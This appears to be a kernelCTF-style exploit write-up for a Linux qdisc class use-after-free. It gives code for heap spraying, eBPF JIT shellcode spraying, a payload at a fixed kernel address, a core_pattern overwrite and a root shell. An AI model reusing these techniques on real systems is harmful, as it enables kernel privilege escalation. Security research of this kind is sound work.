Triggering Vulnerability

Using this vulnerability, we can drop the reference counter of a qdisc class to 0 and then free the class (by deleting it) while it is still attached to an active filter. When a packet is sent to the network, it is enqueued to the network scheduler. If the packet matches our filter, the classifier returns our freed qdisc class. A qdisc class object contains a pointer to a qdisc object, which is used to enqueue packets to the respective network interface via a function pointer.

The relevant code, when drr_class is used as the target object:

static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
		       struct sk_buff **to_free)
{
	unsigned int len = qdisc_pkt_len(skb);
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	int err = 0;
	bool first;

	cl = drr_classify(skb, sch, &err); // [1]
	...
	err = qdisc_enqueue(skb, cl->qdisc, to_free);
	...
	return err;
}

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
				struct sk_buff **to_free)
{
	qdisc_calculate_pkt_len(skb, sch);
	return sch->enqueue(skb, sch, to_free); // [2]
}

At [1], drr_classify returns the freed drr_class. This freed object is then used to obtain the qdisc object via cl->qdisc, which is passed to qdisc_enqueue. If we control cl->qdisc->enqueue, we get RIP control at [2].

Target objects

Our target object is struct drr_class, which resides in kmalloc-128.

Spray objects

For LTS/COS instance

Since CONFIG_KMALLOC_SPLIT_VARSIZE is not set, we can reallocate the freed struct drr_class with ctl_buf. We use sendmsg to spray ctl_buf with controlled data at line [3].

static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
			   unsigned int flags, struct used_address *used_address,
			   unsigned int allowed_msghdr_flags)
...
		BUILD_BUG_ON(sizeof(struct cmsghdr) !=
			     CMSG_ALIGN(sizeof(struct cmsghdr)));
		if (ctl_len > sizeof(ctl)) {
			ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
			if (ctl_buf == NULL)
				goto out;
		}
		err = -EFAULT;
		if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
			goto out_freectl;

For Mitigation instance

Because CONFIG_KMALLOC_SPLIT_VARSIZE is enabled, we need a struct that can be sprayed in the fixed-size kmalloc-128 cache. We found that struct ctnetlink_filter lands in the right cache, so we can spray it and place our payload in it.

static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
	struct ctnetlink_filter *filter;
	int err;
...

	filter = kzalloc(sizeof(*filter), GFP_KERNEL);
...
	err = ctnetlink_filter_parse_mark(&filter->mark, cda);
	if (err)
		goto err_filter;

	err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
	if (err < 0)

This technique allows an 8-byte overwrite at offset 0x60, but requires CONFIG_NF_CONNTRACK_MARK (plus CONFIG_NETFILTER_ADVANCED and CONFIG_NETFILTER) to be enabled.

KASLR Bypass

Spray eBPF programs

Our goal is to spray eBPF JIT pages so that later, when we control kernel RIP, it jumps into a JIT page and executes our shellcode.

The Linux kernel provides the socket option SO_ATTACH_FILTER, which lets a user attach a classic BPF program to a socket as a filter for incoming packets. The kernel converts each classic BPF program to eBPF internally before JIT-compiling it.

By creating many sockets and attaching a classic BPF program to each of them, we can spray a large number of eBPF programs in the kernel.

    struct sock_fprog prog = {
        .len =  TSIZE,
        .filter = filter,
    };
    for(int i=0;i<NUM;i++){
        int fd[2];
        SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
        SYSCHK(setsockopt(fd[0],SOL_SOCKET,SO_ATTACH_FILTER,&prog,sizeof(prog))); // SO_ATTACH_FILTER == 26
    }

The goal of the shellcode in our eBPF program is to overwrite /proc/sys/kernel/core_pattern, so that we can later execute a command as root by triggering a crash. The shellcode performs the following steps:

Use the rdmsr instruction to obtain a kernel text address. With RCX set to MSR_LSTAR (0xc0000082), rdmsr returns the address of entry_SYSCALL_64.
Calculate the addresses of core_pattern and _copy_from_user from that value.
Call _copy_from_user(core_pattern, user_buf, 0x30);, where user_buf is a user-space buffer holding the content we want to write into core_pattern.
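The address calculation in the second step is plain offset arithmetic: subtract the known offset of entry_SYSCALL_64 to recover the randomized kernel base, then add the offsets of the two targets. The sketch below shows only that arithmetic. All three OFF_* values are made-up placeholders (they differ for every kernel build), and the names struct targets and resolve_targets are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Placeholder offsets from the kernel text base. These are NOT real values;
 * they are build-specific and come from the target kernel's symbol table. */
#define OFF_ENTRY_SYSCALL_64 0x0e00080ULL
#define OFF_CORE_PATTERN     0x1db0000ULL
#define OFF_COPY_FROM_USER   0x0700000ULL

struct targets {
    uint64_t core_pattern;
    uint64_t copy_from_user;
};

/* Given the value read from MSR_LSTAR (the runtime address of
 * entry_SYSCALL_64), derive the runtime addresses of the two symbols. */
static struct targets resolve_targets(uint64_t lstar)
{
    struct targets t;
    uint64_t base;

    assert(lstar >= OFF_ENTRY_SYSCALL_64);
    base = lstar - OFF_ENTRY_SYSCALL_64;   /* randomized kernel text base */
    t.core_pattern   = base + OFF_CORE_PATTERN;
    t.copy_from_user = base + OFF_COPY_FROM_USER;
    return t;
}
```

Because the KASLR slide cancels out, the shellcode only needs the two differences OFF_CORE_PATTERN - OFF_ENTRY_SYSCALL_64 and OFF_COPY_FROM_USER - OFF_ENTRY_SYSCALL_64 as constants.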

We construct our classic BPF program (which the kernel translates to eBPF and JIT-compiles) in the following form:

struct sock_filter table[] = {
        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
        .....................
};

After JIT compilation, the above example becomes the following instructions:

b8 90 90 90 b3    mov eax, 0xb3909090
b8 90 90 90 b3    mov eax, 0xb3909090

If we redirect kernel RIP to one of the NOP bytes (0x90), the same bytes decode as:

90       nop 
b3 b8    mov    bl, 0xb8
90       nop
90       nop
90       nop
b3 b8    mov    bl, 0xb8
....

The extra byte 0xb3 turns the otherwise useless 0xb8 opcode byte into the immediate operand of a mov bl instruction, so execution skips over it and continues with our own shellcode. Because of this skipping, each BPF instruction leaves only 3 bytes of space for shellcode, which we have to account for when constructing it.
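To make the realignment concrete, the following sketch rebuilds the byte stream of two mov eax, 0xb3909090 instructions and walks it with a toy decoder that knows only the three opcodes involved. It is an illustration of the decoding argument, not part of the exploit; emit_mov_eax, toy_decode, and decode_spray are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Emit "mov eax, imm32": opcode 0xb8 plus the immediate in little-endian. */
static size_t emit_mov_eax(uint8_t *out, uint32_t imm)
{
    out[0] = 0xb8;
    out[1] = (uint8_t)(imm & 0xff);
    out[2] = (uint8_t)((imm >> 8) & 0xff);
    out[3] = (uint8_t)((imm >> 16) & 0xff);
    out[4] = (uint8_t)((imm >> 24) & 0xff);
    return 5;
}

/* Toy decoder: understands only 0x90 (nop, 1 byte), 0xb3 (mov bl, imm8,
 * 2 bytes) and 0xb8 (mov eax, imm32, 5 bytes). Records one character per
 * decoded instruction ('n', 'b', 'e') and returns the instruction count.
 * Stops at an unknown opcode or a truncated instruction. */
static size_t toy_decode(const uint8_t *code, size_t len, size_t start,
                         char *trace, size_t trace_cap)
{
    size_t pos = start, n = 0;

    assert(trace_cap > 0);
    while (pos < len && n + 1 < trace_cap) {
        size_t ilen;
        char tag;

        switch (code[pos]) {
        case 0x90: ilen = 1; tag = 'n'; break;
        case 0xb3: ilen = 2; tag = 'b'; break;
        case 0xb8: ilen = 5; tag = 'e'; break;
        default:   goto done;
        }
        if (pos + ilen > len)
            break;
        trace[n++] = tag;
        pos += ilen;
    }
done:
    trace[n] = '\0';
    return n;
}

/* Build two copies of "mov eax, 0xb3909090" and decode from offset start. */
static size_t decode_spray(size_t start, char *trace, size_t trace_cap)
{
    uint8_t code[10];
    size_t len = 0;

    len += emit_mov_eax(code + len, 0xb3909090u);
    len += emit_mov_eax(code + len, 0xb3909090u);
    return toy_decode(code, len, start, trace, trace_cap);
}
```

Decoding from offset 0 yields the two intended mov eax instructions, while decoding from offset 1 yields three NOPs, one mov bl that swallows the next 0xb8, and three more NOPs. Those three NOP slots per instruction are where the shellcode bytes go.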

Put payload in fixed kernel address (CVE-2023-0597)

On x86, the Linux kernel maps cpu_entry_area at a fixed kernel address, and that region is also used for the exception stacks. We can load our payload into registers and trigger an exception from user space. The exception handler pushes our registers onto the exception stack, which gives us controlled data at a fixed kernel address.

Catch the signals and skip the offending instruction.

    signal(SIGFPE, handle);
    signal(SIGTRAP, handle);
    signal(SIGSEGV, handle);
    setsid();
    foo(payload);

Load our payload into the registers in a specific order:

foo:
	mov rsp,rdi
	pop r15
	pop r14
	pop r13
	pop r12
	pop rbp
	pop rbx
	pop r11
	pop r10
	pop r9
	pop r8
	pop rax
	pop rcx
	pop rdx
	pop rsi
	pop rdi
	div qword [0x1234000] ; trigger div 0 exception

As a result, we control about 0x80 bytes at a fixed kernel address.

RIP Control

We set cl->qdisc to the fixed kernel address that contains our controlled values, and set the enqueue function pointer stored there to a guessed eBPF JIT address.

Post RIP

Once we control kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted overwrites core_pattern with |/proc/%P/fd/666.

We then use memfd to place an executable payload at fd 666.

int check_core()
{
    // Check if /proc/sys/kernel/core_pattern has been overwritten
    char buf[0x100] = {};
    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    read(core, buf, sizeof(buf));
    close(core);
    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
    int memfd = memfd_create("", 0);
    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
    dup2(memfd, 666);
    close(memfd);
    while (check_core() == 0)
        sleep(1);
    *(size_t *)0 = 0;
}

Later, when the core dump happens, the kernel executes our executable file as root in the root namespace:

*(size_t*)0=0; //trigger coredump

The executable file root spawns a shell when the core dump happens. Its code looks like this:

void* job(void* x){
	FILE* fp = popen("pidof billy","r");
	fread(buf,1,0x100,fp);
	fclose(fp);
	int pid = strtoull(buf,0,10);
	int pfd = syscall(SYS_pidfd_open,pid,0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd,0);
	dup2(stdoutfd,1);
	dup2(stderrfd,2);
	execlp("bash","bash",NULL);

}
int main(int argc,char** argv){	
	job(0);
}
